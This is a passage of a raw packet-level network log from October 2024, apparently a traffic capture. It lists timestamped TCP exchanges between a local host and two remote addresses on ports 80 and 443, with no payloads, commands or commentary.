                                                                                              Oct 24, 2024 08:39:30.047889948 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047900915 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047910929 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047919989 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.047951937 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.047960997 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.048471928 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.048511982 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.048522949 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.048554897 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276556015 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276586056 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276607990 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276619911 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276633024 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276736975 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276753902 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276772976 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276779890 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276779890 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276791096 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276792049 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276808977 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276812077 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276819944 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276839972 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276843071 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276858091 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276878119 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276894093 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276896954 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276912928 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276915073 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276931047 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276933908 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276948929 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276949883 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276964903 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276968002 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.276984930 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.276987076 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.277004957 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.277008057 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.277024031 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.277038097 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.277087927 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.277108908 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.277129889 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.277146101 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.277162075 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.285131931 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.285183907 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.285202026 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.285218000 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.285223961 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.285242081 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.285262108 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.285485029 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.285499096 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.285538912 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.285700083 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.285725117 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.285741091 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.285741091 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.285759926 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.285774946 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.286797047 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.286837101 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.286864042 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.286878109 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.286894083 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.286901951 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.286910057 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.286916971 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.286952972 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.369453907 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.369486094 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.369540930 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.404531956 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.404556990 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.404572964 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.404587984 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.404604912 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.404706955 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.404706955 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.404706955 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.404789925 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.404850006 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.404887915 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.404977083 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.405030966 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.405062914 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.405102968 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.406445980 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.406461000 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.406471014 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.406477928 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.406497955 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.406505108 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.406513929 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.406517029 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.406528950 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.406538010 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.406554937 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.406584978 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.488591909 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.488634109 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.488678932 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.488694906 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.523519039 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.523539066 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.523595095 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.523597956 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.523612022 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.523634911 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.523637056 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.523650885 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.523655891 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.523665905 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.523670912 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.523685932 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.523701906 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.525104046 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.525147915 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.525193930 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.755037069 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.761060953 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:31.226928949 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:31.226973057 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:31.283066988 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:31.283103943 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:31.392441034 CEST49163443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:31.392469883 CEST4434916324.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:31.392530918 CEST49163443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:31.698364973 CEST49163443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:31.698388100 CEST4434916324.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:32.379096985 CEST4434916324.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:32.379173994 CEST49163443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:32.385374069 CEST49163443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:32.385392904 CEST4434916324.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:32.385776043 CEST4434916324.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:32.385858059 CEST49163443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:32.468522072 CEST49163443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:32.515338898 CEST4434916324.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:32.635658979 CEST4434916324.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:32.635763884 CEST4434916324.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:32.635804892 CEST49163443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:32.635804892 CEST49163443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:32.637255907 CEST49163443192.168.2.2224.199.88.84
                                                                                              Oct 24, 2024 08:39:32.637268066 CEST4434916324.199.88.84192.168.2.22
                                                                                              Oct 24, 2024 08:39:32.647783041 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:32.653876066 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:32.653935909 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:32.654067039 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:32.661489010 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.317365885 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.317383051 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.317418098 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.317444086 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.317456961 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.317459106 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.317459106 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.317473888 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.317496061 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.317527056 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.317533970 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.317533970 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.317545891 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.317563057 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.317569971 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.317622900 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.317622900 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.322931051 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.322967052 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.322983980 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.323018074 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.323018074 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.323550940 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.434247971 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.434305906 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.434310913 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.434377909 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.434396982 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.434417963 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.434437990 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.434469938 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.434561968 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.434602022 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.434621096 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.434623957 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.434679985 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.434691906 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.434709072 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.434745073 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.434745073 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.435513973 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.435570955 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.435653925 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.435672045 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.435688019 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.435712099 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.435712099 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.435731888 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.480149031 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.480185032 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.480225086 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.480225086 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.551337957 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.551378012 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.551398039 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.551409006 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.551434040 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.551587105 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.551639080 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.551652908 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.551681042 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.551692963 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.551696062 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.551696062 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.551706076 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.551731110 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.551731110 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.551749945 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.552472115 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.552484989 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.552495956 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.552535057 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.552535057 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.597004890 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.597021103 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.597069979 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.597105980 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.597110987 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.597124100 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.597136021 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.597162008 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.597162008 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.597198009 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.669280052 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.669295073 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.669306993 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.669336081 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.669361115 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.669394016 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.669405937 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.669445992 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.669445992 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.669698000 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.669749975 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.669760942 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.669786930 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.669804096 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.669815063 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.669830084 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.669830084 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.669848919 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.714387894 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.714404106 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.714416981 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.714437008 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.714468956 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.714468956 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.714500904 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.714514971 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.714553118 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.714553118 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.786744118 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.786767006 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.786778927 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.786793947 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.786798000 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.786807060 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.786830902 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.786830902 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.786842108 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.787252903 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.787264109 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.787276030 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.787287951 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.787301064 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.787307024 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.787336111 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.787336111 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.831393957 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.831439018 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.831449986 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.831463099 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.831512928 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.831513882 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.831631899 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.831670046 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.831686020 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.831708908 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.903624058 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.903697968 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.903727055 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.903848886 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.903886080 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.903894901 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.903894901 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.903922081 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.903930902 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.903959990 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.904001951 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.904001951 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.904139042 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.904190063 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.904197931 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.904227018 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.904230118 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.904263020 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.904309034 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.904351950 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.904351950 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.948611021 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.948667049 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.948709965 CEST8049164192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:33.948734999 CEST4916480192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:33.948745966 CEST8049164192.210.215.8192.168.2.22
